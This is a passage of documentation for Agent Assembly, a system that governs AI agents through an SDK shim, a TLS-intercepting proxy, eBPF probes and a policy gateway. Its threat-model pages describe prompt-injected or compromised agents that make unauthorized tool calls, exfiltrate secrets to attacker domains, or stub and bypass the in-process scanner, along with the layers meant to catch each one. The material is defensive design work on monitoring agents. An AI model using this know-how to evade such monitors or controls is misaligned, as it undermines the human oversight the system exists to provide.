$ aasm proxy install-ca      # trust the per-host CA so TLS interception works
$ aasm proxy start           # background sidecar on 127.0.0.1:8899
$ aasm proxy status          # confirm it is running
$ aasm proxy logs            # tail the proxy log
$ aasm proxy uninstall-ca    # remove the CA when you are done

aasm proxy start takes --listen <addr> (default 127.0.0.1:8899), --gateway <url>, and --ca-dir <dir>.

Layer 3 in practice — eBPF

The eBPF layer is Linux-only: its uprobes/kprobes/tracepoints attach to a running kernel.

$ aasm proxy status
not running

On macOS the eBPF userspace crate compiles with non-Linux stubs (the KprobeManager/UprobeManager attach paths are #[cfg(target_os = "linux")]), so it builds for development but does not attach probes. To exercise the real kernel hooks — SSL-library uprobes for outbound TLS, exec/openat/unlink kprobes, and the sched_process_exec tracepoint — run on Linux.

Honest caveat. This page does not show live eBPF probe output because the attaching code is gated to Linux and this build was exercised on macOS. The architecture (userspace aa-ebpf loading compiled aa-ebpf-probes and reading a shared BPF ring buffer) is real and documented in the crate; the live capture requires a Linux host with the privileges to load eBPF programs.

Result

You can match the interception layer (or stack of layers) to the requirement: SDK for precision where you own the code, proxy for code-free egress control, eBPF for a bypass-proof kernel backstop on Linux — all feeding one gateway and one audit log.

Last updated: 2026-06-11 by Bryant

Runnable examples

The pages in this guide explain how governance works. When you want to run it, the framework-specific, end-to-end examples live in the dedicated agent-assembly-examples repository rather than in this book — that keeps the runnable code versioned and testable on its own, while these pages stay focused on the concepts.

Every example is governed by the same three-layer interception model described in Choosing interception layers: a gateway as the brain, at least one interception layer (SDK shim, aa-proxy sidecar, or eBPF), and a policy. Pick the language you are integrating, or browse the cross-cutting scenarios:

Node — examples-repo/node
Python — examples-repo/python
Go — examples-repo/go
Scenarios (cross-cutting: approval-gates, audit-trace, budget-limits, policy-enforcement, sidecar-runtime) — examples-repo/scenarios

Last updated: 2026-06-14 by Chisanan232

Troubleshooting

Common local issues and the real diagnostics to resolve them. Every error message below is reproduced verbatim from the 0.0.1-alpha.5 build.

`aasm start` fails: “failed to spawn aa-gateway”

$ aasm start --mode local --port 7391
aasm start: failed to spawn aa-gateway: No such file or directory (os error 2)

Cause. aasm start shells out to a separate aa-gateway binary, which must be on your PATH.

Fix. Build it and put target/debug on PATH:

$ cargo build -p aa-gateway --bin aa-gateway
$ export PATH="$PWD/target/debug:$PATH"
$ aasm start --mode local --port 7391

`aasm start` fails: “--policy is required in legacy-grpc mode”

$ aasm start
Error: "--policy is required in legacy-grpc mode"
aasm start: gateway did not become ready within 5.000335375s

Cause. The aa-gateway binary defaults to its legacy gRPC mode, which requires a policy file. For a local control plane with the HTTP API and dashboard, you want local mode, which does not.

Fix. Run local mode directly:

$ aa-gateway --mode local
Agent Assembly [local mode] v0.0.1-alpha.5
  Listening:  http://127.0.0.1:7391
  Dashboard:  http://127.0.0.1:7391/
  Storage:    /Users/you/.aasm/local.db (SQLite)

  Ctrl+C to stop.

For the legacy gRPC server, supply a policy: aa-gateway --policy policy-examples/low-risk.yaml.

CLI commands say the gateway is “unreachable”

$ aasm status
Agent Assembly Status
─────────────────────────────────────
  Gateway:   http://localhost:8080
  Health:    ✗ unreachable
─────────────────────────────────────
...
Error: gateway is not running. Start it with: aasm start

$ aasm version
+-----------+---------------+-------------+
| COMPONENT | VERSION       | STATUS      |
+=========================================+
| cli       | 0.0.1-alpha.5 | -           |
|-----------+---------------+-------------|
| gateway   | -             | unreachable |
|-----------+---------------+-------------|
| api       | -             | unreachable |
+-----------+---------------+-------------+

Cause. The CLI defaults to the SaaS control-plane API on http://localhost:8080. The local-mode gateway serves its API on 7391, not 8080, so the default target is unreachable.

Fix. Point the CLI at the local API:

$ aasm --api-url http://127.0.0.1:7391 status
Agent Assembly Status
─────────────────────────────────────
  Mode:      local
  Gateway:   http://127.0.0.1:7391
  Storage:   sqlite
  Version:   0.0.1-alpha.5
  Uptime:    2m 24s
  Health:    ✓ ok
─────────────────────────────────────

To avoid repeating the flag, save a named context with aasm context or set the API URL in ~/.aa/config.yaml.

`aasm gateway status` says “not running” even though local mode is up

$ aasm gateway status
Gateway: not running

Cause. aasm gateway status tracks the legacy gRPC gateway via its PID file. A gateway started in local mode (aa-gateway --mode local) is a different process and is not reflected here.

Fix. Check local-mode liveness with the HTTP status instead:

$ aasm --api-url http://127.0.0.1:7391 status

or hit the health endpoint directly: curl http://127.0.0.1:7391/healthz.
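The same liveness check can be scripted, for example in a readiness loop before running tests. This sketch assumes the /healthz endpoint answers HTTP 200 when the gateway is up; the function name `gateway_healthy` is hypothetical.

```python
import urllib.error
import urllib.request


def gateway_healthy(base_url: str = "http://127.0.0.1:7391",
                    timeout: float = 2.0) -> bool:
    """Return True if GET <base_url>/healthz answers with HTTP 200."""
    try:
        with urllib.request.urlopen(f"{base_url}/healthz", timeout=timeout) as resp:
            return resp.status == 200
    except (urllib.error.URLError, OSError):
        # Connection refused, timeout, DNS failure, or a non-2xx response.
        return False
```

Returning a plain boolean instead of raising keeps the caller's retry loop simple.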

A dashboard page loads but its tables stay empty / skeleton

Cause. The dashboard SPA served by the local-mode gateway can render its chrome and page shells, but its data endpoints (/api/v1/fleet, /api/v1/policies, …) are served by the SaaS/cloud control plane on port 8080, which is not part of the open-source local runtime. With only the local gateway running, data panels stay empty or in their loading state.

Fix. Connect a control plane that serves the /api/v1/* data routes (the hosted backend), or use the CLI (aasm agent list, aasm policy list, aasm cost summary) against the local API for the same data in the terminal. See Observe in the dashboard.

`policy validate` prints “Unknown key … will be ignored”

$ aasm policy validate policy-examples/medium-risk.yaml
warning: tier — Unknown key 'tier' will be ignored
warning: rules — Unknown key 'rules' will be ignored
warning: notifications — Unknown key 'notifications' will be ignored
Policy is valid: policy-examples/medium-risk.yaml

Cause. These are warnings, not errors — the policy still validates. The keys tier, rules, notifications, and similar are not part of the schema the gateway enforces; the supported spec sections are network, schedule, budget, data, tools, capabilities, approval, and scope.

Fix. Move the intended behaviour into a supported section (e.g. express allow/deny via capabilities or tools, gating via approval), or ignore the warnings if the extra keys are intentional annotations. The capability-policy.yaml example validates with no warnings and is a good reference shape.
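To catch unsupported keys before a policy reaches review, a pre-commit check can compare section names against the supported list above. The sketch assumes the flagged keys sit directly under `spec` and that the policy has already been parsed into a dict; the function name `unknown_spec_keys` is hypothetical, and aasm policy validate remains the authoritative check.

```python
from typing import Dict, List

# Supported spec sections, as listed in the Cause paragraph above.
SUPPORTED_SPEC_SECTIONS = {
    "network", "schedule", "budget", "data",
    "tools", "capabilities", "approval", "scope",
}


def unknown_spec_keys(spec: Dict) -> List[str]:
    """Return spec keys the gateway would ignore, in document order."""
    return [key for key in spec if key not in SUPPORTED_SPEC_SECTIONS]


flagged = unknown_spec_keys(
    {"tier": "medium", "rules": [], "budget": {}, "notifications": {}}
)
```

For the sample input, `flagged` holds `tier`, `rules`, and `notifications`, the same three keys the validator warns about.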

A wildcard egress host is denied in `policy simulate`

If aasm policy simulate denies a host that your *.example.com allowlist entry should permit, this is expected: the simulator’s decision path uses an exact host comparison, while the live aa-proxy uses the glob-aware matcher. Confirm the host against the running proxy rather than treating the simulation deny as a real block — see the caveat in Enforce an egress policy.

Quick reference

Symptom	First thing to check
“failed to spawn aa-gateway”	`aa-gateway` on `PATH`?
“--policy is required”	Use `aa-gateway --mode local`, not the default
“unreachable” on every CLI call	Pass `--api-url http://127.0.0.1:7391`
`gateway status` “not running”	Local mode ≠ legacy gRPC; use `status` / `/healthz`
Empty dashboard tables	Data API (port 8080) not running locally
`validate` warnings	Unknown keys ignored — move into a supported section

Last updated: 2026-06-11 by Bryant

Security Model — Overview

Agent Assembly governs AI agents that you do not fully trust, running inside processes you do not fully control. The Security Model describes what the system protects, against whom, and how — and, just as importantly, where it refuses to place its trust.

This section is the why. For the how — concrete crates, types, and data paths — follow the cross-links into Architecture.

What the Security Model protects

An AI agent is, from a security standpoint, an attacker-shaped component: it executes language-model output, calls external tools, opens network connections, reads files, and spends money — all driven by prompts that may be adversarially crafted (prompt injection) or by a model that has been compromised or simply behaves unpredictably. The Security Model exists to keep that component inside a governed boundary. Concretely it protects:

Tool and capability use — an agent may only invoke the tools its policy permits. Denied tool calls are refused before they execute.
Network egress — outbound connections are constrained to an allowlist; exfiltration to an arbitrary host is blocked.
Credentials and sensitive data — API keys, private keys, and connection strings are detected and redacted on every path before they are forwarded or persisted, so a leaked secret never lands in an upstream request or an audit record.
Spend — per-team and per-org budgets cap how much an agent can cost; a runaway agent is denied or suspended when it exceeds its limit.
The audit trail itself — every governed action produces a sanitized, tamper-evident record, so the system’s own evidence cannot be quietly poisoned with raw secrets or per-event noise.

Defense-in-depth philosophy

The Security Model rests on three principles, each developed in its own page.

1. Layered interception — see the action before you can govern it

To govern an action the system must first observe it. Agent Assembly intercepts at three independent layers: the in-process SDK shim (aa-sdk-client), the sidecar proxy (aa-proxy), and kernel-level eBPF (aa-ebpf). They are ordered from lowest latency to highest detection authority, so the SDK is the cheapest and least authoritative layer and eBPF the costliest and most authoritative. The layers are not alternatives; they stack, so an action that slips past one is caught by the next. Coverage is the union of the layers you deploy.

2. The SDK is not a trust boundary — the runtime is authoritative

The fastest layer runs inside the agent’s own process, which is exactly the component we do not trust. So the system treats SDK-side checks as best-effort advisory only and re-does the authoritative work at a trusted chokepoint: the runtime (aa-runtime) re-scans, re-redacts, and re-normalizes every event unconditionally, and the gateway (aa-gateway) is the sole source of truth for policy. This is recorded as a formal decision in ADR 0002 and detailed in Trust boundaries.

Invariant: nothing the SDK asserts can shorten the trusted side’s work. Position — not code — confers authority. The same aa-security scanner is advisory inside the SDK and authoritative inside aa-runtime.
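The invariant can be illustrated with a toy ingest function on the trusted side. This is a conceptual sketch only: the event fields (`text`, `already_scanned`) are hypothetical, and a single regular expression stands in for the real aa-security scanner.

```python
import re
from typing import Dict

# Hypothetical secret shape, for illustration only.
SECRET_RE = re.compile(r"sk-[A-Za-z0-9]{8,}")


def runtime_ingest(event: Dict) -> Dict:
    """Trusted side: scan and redact regardless of what the sender claims."""
    # Any sender-supplied "already scanned" claim is dropped, never honored.
    cleaned = {k: v for k, v in event.items() if k != "already_scanned"}
    cleaned["text"] = SECRET_RE.sub("[REDACTED]", str(cleaned.get("text", "")))
    return cleaned


out = runtime_ingest({"text": "key sk-abcdefgh12345678", "already_scanned": True})
```

The function has no branch that skips the scan, so a stubbed or lying SDK changes nothing about what the trusted side forwards or records.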

3. Fail-closed by default

When the system cannot make a safe decision, it denies. An empty policy cascade returns a fail-closed Deny (aa-gateway/src/engine/decision.rs), and a secret-bearing field too large to fully scan is redacted whole rather than forwarded raw (aa-runtime/src/pipeline/enforcement.rs, OversizedPolicy::RedactWhole). See Protection and enforcement.
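Both fail-closed behaviours follow the same pattern: the default branch is the safe one. The sketch below is a simplified model, not the gateway or runtime code; it assumes a first-verdict-wins cascade, and the size limit and all names are hypothetical.

```python
from typing import Callable, Dict, Iterable, Optional

# A stage returns "allow", "deny", or None when it has no opinion.
Stage = Callable[[Dict], Optional[str]]


def evaluate(stages: Iterable[Stage], action: Dict) -> str:
    """Walk the cascade; if nothing decides, deny."""
    for stage in stages:
        verdict = stage(action)
        if verdict is not None:
            return verdict
    return "deny"  # fail closed: an empty or silent cascade permits nothing


def redact_if_oversized(value: str, limit_bytes: int = 64 * 1024) -> str:
    """Redact a field whole when it is too large to scan fully."""
    if len(value.encode("utf-8")) > limit_bytes:
        return "[REDACTED]"
    return value  # a real pipeline would scan the value at this point
```

The important property is what happens when no rule matches or a field cannot be inspected: the outcome is a deny or a redaction, never a pass-through.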

How the pages fit together

Page	Question it answers
Threat model	What assets, adversaries, and threats are in scope?
Three-layer defense in depth	How do SDK, proxy, and eBPF compose so nothing slips through?
Protection and enforcement	How are policy, fail-closed, egress, scanning, and budgets enforced?
Trust boundaries	Why is the SDK untrusted and the runtime/gateway authoritative?
Audit and assurance	How is the audit trail kept tamper-evident and free of secrets?

Last updated: 2026-06-11 by Chisanan232

Threat model

This page enumerates what the Security Model defends: the assets worth protecting, the adversaries who threaten them, and the concrete threats each control answers. It is specific to Agent Assembly — the system that governs AI agents at the three interception layers and a central gateway.

Assets

Asset	Why it matters	Primary guard
Credentials & secrets — API keys, private keys, DB connection strings	Leaking one grants an attacker the agent’s privileges across third-party systems	`aa-security` credential scanner + redaction, run authoritatively in `aa-runtime`
Tool / capability surface	An unauthorized tool call is arbitrary code or data access on the agent’s behalf	Gateway policy engine (`aa-gateway/src/policy/`, `aa-gateway/src/engine/`)
Network egress paths	The channel through which data is exfiltrated	Network-egress policy (`aa-gateway/src/policy/network.rs`) + proxy MitM (`aa-proxy`) + eBPF SSL uprobes
Spend / budget	A looping or hijacked agent can burn unbounded cost	Budget control (`aa-gateway/src/budget/`) — deny or suspend on exceed
The audit trail	It is the evidence of what happened; if it can be poisoned, accountability is lost	Write-boundary sanitizer (`aa-gateway/src/sanitizer/`) + tamper-evident publish (`aa-runtime/src/audit_publisher/`)
Policy as source of truth	If the agent could author its own policy, governance is meaningless	Policy SoT is server-side in the gateway; the SDK cannot mutate it

Adversaries

The model assumes the agent’s own process is not trusted. The relevant adversaries are:

The prompt-injected agent. A legitimate, SDK-adopting agent whose model has been steered by adversarial input into making tool calls, network requests, or data accesses its operator never intended. It is cooperative at the binary level but hostile at the behavioral level.
The compromised / modified agent. An agent whose code has been altered — including one running a patched, outdated, or stubbed SDK — that deliberately tries to suppress, weaken, or skip the in-process checks.
The bypassing agent. An agent that ignores the SDK entirely and makes raw syscalls, opens its own sockets, or links TLS directly to avoid the fastest interception layer.
The careless integrator. Not malicious, but ships secrets in tool arguments or LLM payloads, or wires an agent to an over-broad capability set.

Trust posture. Because the SDK runs inside an attacker-controllable process, any guarantee anchored in the SDK is not a guarantee. Security must hold even when the SDK does nothing — see Trust boundaries and ADR 0002.

Threat scenarios

Unauthorized tool call — a prompt-injected agent invokes a tool outside its policy (e.g. terminal_exec, or read_file on /etc/...). Caught by the gateway tool allow/deny stage and, for MCP tools/call, by argument-level matching in the proxy (aa-proxy/src/intercept/mcp.rs).
Credential / data exfiltration — the agent embeds an API key in an LLM prompt or a tool argument and sends it upstream. The aa-security scanner detects the secret (via Aho-Corasick literal patterns) and redacts it before forward and before audit, on every path.
Network egress to an arbitrary host — the agent attempts to POST data to an attacker-controlled domain. The gateway’s network allowlist denies the request; the proxy enforces it at the wire even with no agent code change; eBPF SSL uprobes observe the plaintext if the agent bypasses both.
Policy evasion / SDK bypass — the agent disables, stubs, or skips the SDK scanner, or asserts an “already clean” marker. Defeated structurally: there is no trust marker on the wire, and aa-runtime re-scans unconditionally. This is proven by the bypass-resistance suite (aa-runtime/tests/aaasm_2568_gate_verification.rs).
Runaway spend — a looping agent issues unbounded LLM calls. The budget tracker denies further requests once the daily/monthly limit is met, or suspends the agent, per action_on_exceed.
Audit poisoning / secret leakage into logs — a sender emits raw prompts, full payloads, or per-beat heartbeat noise into the audit stream. The write-boundary sanitizer strips banned keys recursively and collapses heartbeats before anything reaches audit_logs.
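Recursive banned-key stripping, as described in the audit-poisoning scenario, can be sketched as a small tree walk. The key names below are hypothetical placeholders rather than the sanitizer's actual ban list, and heartbeat collapsing is not modelled.

```python
from typing import Any

# Hypothetical ban list; the real sanitizer defines its own.
BANNED_KEYS = {"prompt", "raw_payload"}


def strip_banned(value: Any) -> Any:
    """Remove banned keys at every depth of a JSON-like structure."""
    if isinstance(value, dict):
        return {k: strip_banned(v) for k, v in value.items()
                if k not in BANNED_KEYS}
    if isinstance(value, list):
        return [strip_banned(item) for item in value]
    return value  # scalars pass through unchanged


clean = strip_banned({
    "agent_id": "researcher-1",
    "prompt": "full user prompt",
    "detail": {"raw_payload": "...", "ok": 1,
               "items": [{"prompt": "nested", "n": 2}]},
})
```

Walking lists as well as dicts matters, because a banned key nested inside an array element would otherwise survive into the stored record.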

STRIDE mapping

STRIDE category	Threat in this system	Control
Spoofing	Agent claims an identity / lineage it does not have to widen its policy scope	Gateway resolves agent lineage server-side from registered context; the policy cascade is keyed to it (`aa-gateway/src/engine/mod.rs`)
Tampering	Agent forges event fields or asserts “already scanned” to skip enforcement	No trust marker honored; `aa-runtime` re-scans every event; the sanitizer drops unknown top-level fields (`aa-gateway/src/sanitizer/`)
Repudiation	Action happens with no trustworthy record	Tamper-evident audit publish to NATS, subject `assembly.audit.<tenant>.<agent>` (`aa-runtime/src/audit_publisher/subject.rs`)
Information disclosure	Secrets leak via upstream requests or audit logs	`aa-security` scan + redact on every path; banned-key sanitizer as the final write-boundary backstop
Denial of service / spend exhaustion	Runaway agent burns budget or floods events	Budget deny/suspend (`aa-gateway/src/budget/`); fail-closed oversized-field cap bounds per-event scan cost
Elevation of privilege	Agent invokes a tool or egress beyond its grant	Policy engine deny stages; fail-closed empty cascade → `Deny` (`aa-gateway/src/engine/decision.rs`)

Each control is detailed in Protection and enforcement.
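The audit subject in the Repudiation row has a fixed four-token shape. The sketch below builds it and rejects identifiers that would corrupt the subject hierarchy, since NATS reserves `.`, `*`, and `>` and forbids whitespace in tokens. How the real publisher validates or escapes identifiers is not shown in this book, so the rejection behaviour here is an assumption.

```python
def audit_subject(tenant: str, agent: str) -> str:
    """Build assembly.audit.<tenant>.<agent>, refusing unsafe tokens."""
    for token in (tenant, agent):
        if not token:
            raise ValueError("subject token must not be empty")
        if any(c in ".*>" or c.isspace() for c in token):
            # "." would add a level; "*" and ">" are NATS wildcards.
            raise ValueError(f"unsafe subject token: {token!r}")
    return f"assembly.audit.{tenant}.{agent}"


subject = audit_subject("acme", "researcher-1")
```

Refusing a dotted identifier prevents one agent's events from being published under a subject that appears to belong to another tenant or agent.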

Last updated: 2026-06-11 by Chisanan232

Three-layer defense in depth

To govern an action, Agent Assembly must first observe it. It does so at three independent interception layers, each catching what the layers above it might miss, and routes every observed action to one central gateway for the decision. This page explains why the layers are arranged the way they are and how they compose so an agent cannot quietly slip through. For the policy decision itself, see Protection and enforcement; for how implementation maps to crates, see Architecture.

The latency-vs-authority trade-off

The layers are ordered by a deliberate trade-off, running from lowest latency (Layer 1) to highest detection authority (Layer 3):

Layer	Runs in	Crate(s)	Cost	Catches	Detection authority
1 — SDK (in-process)	The agent’s own process	`aa-sdk-client` + per-language shims, `aa-wasm`	Lowest	What the SDK is wired into	Lowest — lives inside the untrusted process
2 — Sidecar proxy	An adjacent process / sidecar	`aa-proxy`	Medium	Outbound HTTPS, no code change	Medium — sees only routed traffic
3 — eBPF (kernel)	The Linux kernel	`aa-ebpf`, `aa-ebpf-probes`	Highest	Everything else, including bypass attempts	Highest — observes below anything the agent can reach

The in-process SDK is the cheapest place to make a decision, but also the easiest for an agent to avoid, because it lives inside the very process we do not fully trust. The eBPF layer is the most expensive to run, but it watches from the kernel, below anything the agent can reach, so it catches actions the higher layers never saw, including deliberate attempts to bypass the SDK. Authority rises with cost: the cheaper a layer is, the less you can trust it to be present.

What each layer catches

Layer 1 — SDK shim (in-process)

The language SDKs call into a thin native shim over aa-sdk-client, which ships events over a Unix domain socket to the runtime and applies pre-execution allow/deny via wrapper functions. It is the fastest path and gives the richest context (it sees the call before it happens), but it requires the agent to adopt the SDK and can be skipped. Its security checks are advisory only — see Trust boundaries.

Layer 2 — Sidecar proxy (`aa-proxy`)

The proxy terminates outbound TLS with a per-host certificate signed by a local CA generated on first start (aa-proxy/src/tls/ca.rs), inspects the decrypted request, and enforces network-egress and data policy at the wire — with no change to agent code. The interceptor returns a VerdictDecision of Forward, ForwardRedacted, Block, or AlertAndForward (aa-proxy/src/intercept/mod.rs), and for MCP tools/call it can match on arguments (aa-proxy/src/intercept/mcp.rs) — a precision the raw-bytes scanner alone cannot reach. It catches egress the SDK missed, but sees only what is routed through it.

Layer 3 — eBPF (kernel)

The kernel layer attaches uprobes to the SSL library — SSL_write (outbound plaintext) and SSL_read entry/exit (inbound plaintext) in aa-ebpf-probes/src/ssl_probes.rs — and tracepoints/kprobes for process exec and file syscalls (aa-ebpf-probes/src/exec_probes.rs, aa-ebpf/src/kprobe.rs). Because it observes at the syscall / library boundary, it sees TLS plaintext and process activity even when the agent never adopted the SDK and never routed through the proxy. It is the floor. It is Linux-only and needs elevated privileges.

How the layers compose

The layers are not alternatives — they stack. A deployment runs whatever subset fits its constraints, and because every layer reports to the same gateway using the same audit wire format (aa-proto audit events), the gateway sees one unified view no matter which layers produced the events. Coverage is the union of the layers you deploy:

the SDK handles the fast common path,
the proxy backstops network egress without touching agent code,
eBPF is the floor that catches what slips past both.

Run all three and an action has nowhere to hide — an attempt to evade a higher layer simply surfaces at a lower one.

graph TD
    classDef agent fill:#eef2ff,stroke:#6366f1
    classDef l1 fill:#eaf6ee,stroke:#3aa55b
    classDef l2 fill:#fff3d6,stroke:#c98a00
    classDef l3 fill:#fdecea,stroke:#d75748
    classDef gw fill:#e8f1ff,stroke:#5b8def

    Agent["AI agent<br/>(tool / LLM / network calls)"]:::agent

    subgraph Interception["Three interception layers (union coverage)"]
        L1["Layer 1 — SDK shim<br/>aa-sdk-client · in-process · lowest latency<br/><i>advisory checks only</i>"]:::l1
        L2["Layer 2 — Sidecar proxy<br/>aa-proxy · MitM outbound HTTPS<br/>Forward / Redact / Block"]:::l2
        L3["Layer 3 — eBPF<br/>aa-ebpf · kernel SSL uprobes + syscalls<br/>highest authority"]:::l3
    end

    GW["Gateway (aa-gateway)<br/>authoritative policy · budget · decision"]:::gw
    RT["Runtime (aa-runtime)<br/>authoritative scan + redact"]:::gw
    Audit[("Tamper-evident<br/>audit trail")]

    Agent -->|"adopted SDK path"| L1
    Agent -.->|"routed HTTPS"| L2
    Agent -.->|"raw syscalls / TLS<br/>(bypass attempt)"| L3

    L1 --> RT
    L2 --> RT
    L3 --> RT
    RT -->|"unified audit wire format"| GW
    GW --> Audit

flowchart LR
    classDef catch fill:#eaf6ee,stroke:#3aa55b
    classDef miss fill:#fdecea,stroke:#d75748

    A["Agent action"] --> Q1{"SDK adopted<br/>& wired?"}
    Q1 -->|yes| C1["Caught at Layer 1<br/>(SDK)"]:::catch
    Q1 -->|"no / skipped"| Q2{"Routed<br/>through proxy?"}
    Q2 -->|yes| C2["Caught at Layer 2<br/>(proxy egress)"]:::catch
    Q2 -->|"no / direct socket"| Q3{"Linux + eBPF<br/>deployed?"}
    Q3 -->|yes| C3["Caught at Layer 3<br/>(eBPF kernel)"]:::catch
    Q3 -->|no| U["Uncovered<br/>(deploy eBPF to close)"]:::miss

The second diagram makes the composition explicit: an action only escapes governance if it evades every deployed layer. With eBPF present, the bypass path collapses to “caught at Layer 3.”
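The fall-through in the second diagram can be sketched as a small function. This is only an illustration: `Deployment`, `Action`, and `catching_layer` are hypothetical names invented here, not types from the agent-assembly crates.

```rust
/// Interception layers, ordered from cheapest to most authoritative.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Layer {
    Sdk,
    Proxy,
    Ebpf,
}

/// Which layers a deployment runs (hypothetical type, for illustration only).
#[derive(Debug, Clone, Copy)]
pub struct Deployment {
    pub sdk: bool,
    pub proxy: bool,
    pub ebpf: bool,
}

/// How one agent action behaves (hypothetical type, for illustration only).
#[derive(Debug, Clone, Copy)]
pub struct Action {
    /// The action went through an SDK wrapper.
    pub uses_sdk: bool,
    /// The action's traffic was routed through the sidecar proxy.
    pub routed_via_proxy: bool,
}

/// Returns the first layer that observes the action, or `None` if it is uncovered.
pub fn catching_layer(deployment: Deployment, action: Action) -> Option<Layer> {
    if deployment.sdk && action.uses_sdk {
        Some(Layer::Sdk)
    } else if deployment.proxy && action.routed_via_proxy {
        Some(Layer::Proxy)
    } else if deployment.ebpf {
        // The kernel layer needs no cooperation from the agent.
        Some(Layer::Ebpf)
    } else {
        None
    }
}
```

With all three layers deployed, an action that skips both the SDK and the proxy still resolves to `Some(Layer::Ebpf)`; only a deployment without eBPF can return `None` for it.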

Protection and enforcement

Once an action is observed (see Three-layer defense in depth), it must be decided on and, where necessary, blocked or scrubbed. This page covers the enforcement machinery: policy evaluation, fail-closed behavior, network-egress control, credential scanning & redaction, and budgets as a control. Every claim below is grounded in the gateway, runtime, and security crates; for the broader component picture see Architecture.

Policy evaluation

The gateway is the authoritative decision point. The policy engine (aa-gateway/src/engine/mod.rs) evaluates an AgentContext + GovernanceAction and returns a PolicyDecision — Allow, RequireApproval { reason, timeout_secs }, or Deny { reason, source_scope } (aa-gateway/src/engine/decision.rs).

Evaluation runs as a staged pipeline. The single-policy path (evaluate_primary) and the scoped-cascade path (evaluate_with_cascade) share the same stages:

Stage	Check	Outcome on violation
1	Schedule / active-hours window	`Deny` “outside active hours”
2	Network allowlist (for `NetworkRequest`)	`Deny` “host not in network allowlist”
3	Tool allow/deny	`Deny` “tool denied by policy”
4	Tool rate limit	`Deny` “rate limit exceeded”
5	Approval condition (`requires_approval_if`)	`RequireApproval`
6	Credential / custom-pattern scan	redact in memory — never deny
7	Budget (monthly then daily)	`Deny` “budget exceeded” + optional `SuspendAgent`

Stage 6 is notable: a credential finding redacts rather than denies, so a governed action still proceeds but the secret never travels upstream. Denial is reserved for policy, egress, rate, and budget violations.
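A minimal sketch of the stage ordering, assuming each check has already been reduced to a boolean. `StageInputs`, `Outcome`, and `evaluate` are hypothetical stand-ins rather than the engine's real API, the `[REDACTED:secret]` label and the 300-second timeout are placeholders, and `Deny` omits the `source_scope` field for brevity.

```rust
/// Simplified decision type; the real `Deny` also carries a `source_scope`.
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum PolicyDecision {
    Allow,
    RequireApproval { reason: String, timeout_secs: u64 },
    Deny { reason: String },
}

/// Hypothetical pre-computed inputs, standing in for `AgentContext` + `GovernanceAction`.
#[derive(Debug, Clone)]
pub struct StageInputs {
    pub within_active_hours: bool,
    pub host_allowed: bool,
    pub tool_allowed: bool,
    pub under_rate_limit: bool,
    pub needs_approval: bool,
    pub payload: String,
    /// A secret the scanner found in `payload`, if any.
    pub detected_secret: Option<String>,
    pub budget_exceeded: bool,
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Outcome {
    pub decision: PolicyDecision,
    /// Present only when the action proceeds; always the redacted form.
    pub forwarded_payload: Option<String>,
}

fn stop(decision: PolicyDecision) -> Outcome {
    Outcome { decision, forwarded_payload: None }
}

fn deny(reason: &str) -> Outcome {
    stop(PolicyDecision::Deny { reason: reason.to_string() })
}

/// Runs the seven stages in order; the first violation ends evaluation.
pub fn evaluate(input: &StageInputs) -> Outcome {
    if !input.within_active_hours {
        return deny("outside active hours"); // Stage 1
    }
    if !input.host_allowed {
        return deny("host not in network allowlist"); // Stage 2
    }
    if !input.tool_allowed {
        return deny("tool denied by policy"); // Stage 3
    }
    if !input.under_rate_limit {
        return deny("rate limit exceeded"); // Stage 4
    }
    if input.needs_approval {
        // Stage 5: the reason and timeout here are placeholder values.
        return stop(PolicyDecision::RequireApproval {
            reason: "approval condition matched".to_string(),
            timeout_secs: 300,
        });
    }
    // Stage 6: a finding redacts in memory and evaluation continues.
    let payload = match &input.detected_secret {
        Some(secret) if !secret.is_empty() => {
            input.payload.replace(secret.as_str(), "[REDACTED:secret]")
        }
        _ => input.payload.clone(),
    };
    if input.budget_exceeded {
        return deny("budget exceeded"); // Stage 7
    }
    Outcome { decision: PolicyDecision::Allow, forwarded_payload: Some(payload) }
}
```

The point of the sketch is the asymmetry: stages 1 to 5 and 7 can stop the action, while stage 6 only changes what is forwarded.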

Scoped cascade and most-restrictive-wins

When scoped policies are loaded, the engine collects a cascade of PolicyDocuments along the agent’s lineage (Global → Org → Team → Agent) and merges them with most-restrictive-wins semantics (merge_decisions in aa-gateway/src/engine/decision.rs): any Deny short-circuits and wins; otherwise the narrowest-scope RequireApproval wins; only an all-Allow cascade returns Allow.
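The merge rule can be sketched as follows. The signature is an assumption (the real `merge_decisions` may take different arguments); the sketch pairs each decision with the scope that produced it and also shows the fail-closed result for an empty cascade.

```rust
/// Scopes ordered from widest to narrowest, so `Agent` compares greatest.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum Scope {
    Global,
    Org,
    Team,
    Agent,
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub enum PolicyDecision {
    Allow,
    RequireApproval { reason: String, timeout_secs: u64 },
    Deny { reason: String, source_scope: Scope },
}

/// Most-restrictive-wins merge over per-scope decisions (illustrative signature).
pub fn merge_decisions(cascade: &[(Scope, PolicyDecision)]) -> PolicyDecision {
    if cascade.is_empty() {
        // No policy at all: fail closed rather than silently allow.
        return PolicyDecision::Deny {
            reason: "no policy — fail-closed".to_string(),
            source_scope: Scope::Global,
        };
    }
    let mut approval: Option<(Scope, &PolicyDecision)> = None;
    for (scope, decision) in cascade {
        match decision {
            // Any Deny short-circuits and wins.
            PolicyDecision::Deny { .. } => return decision.clone(),
            // Remember the RequireApproval from the narrowest scope seen so far.
            PolicyDecision::RequireApproval { .. } => {
                if approval.map_or(true, |(best, _)| *scope > best) {
                    approval = Some((*scope, decision));
                }
            }
            PolicyDecision::Allow => {}
        }
    }
    // Only an all-Allow cascade falls through to Allow.
    approval.map_or(PolicyDecision::Allow, |(_, decision)| decision.clone())
}
```

Deriving `Ord` on `Scope` keeps the "narrowest scope" comparison to a single `>`; that ordering trick is a choice made for this sketch, not something the source states.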

Fail-closed behavior

The system denies whenever it cannot make a safe decision. Two load-bearing examples:

Empty policy cascade → Deny. merge_decisions returns a fail-closed Deny { reason: "no policy — fail-closed", source_scope: Global } for an empty cascade — it never silently allows (aa-gateway/src/engine/decision.rs).
